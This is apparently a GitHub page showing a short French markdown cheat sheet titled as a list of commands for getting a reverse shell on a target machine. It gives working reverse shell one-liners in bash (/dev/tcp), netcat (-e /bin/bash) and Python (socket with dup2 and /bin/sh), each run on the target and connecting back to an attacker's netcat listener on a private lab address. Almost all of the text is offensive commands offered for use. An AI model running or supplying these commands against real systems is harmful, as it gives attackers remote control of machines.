Skip to content

Latest commit

 

History

History
27 lines (18 loc) · 637 Bytes

reverseshell.md

File metadata and controls

27 lines (18 loc) · 637 Bytes

Liste de commandes pour obtenir un reverseshell sur la machine cible

    (A) Attaquant: 192.168.10.10
    (C) cible: 192.168.10.100

Bash

(A) # nc -nlvp 4444
(C) # bash -i >& /dev/tcp/192.168.10.10/4444 0>&1

netcat

(A) # nc -nlvp 4444
(C) # nc -e /bin/bash 192.168.10.10 4444

Python

(A) # nc -nlvp 4444
(C) # python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.10.10",4444)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'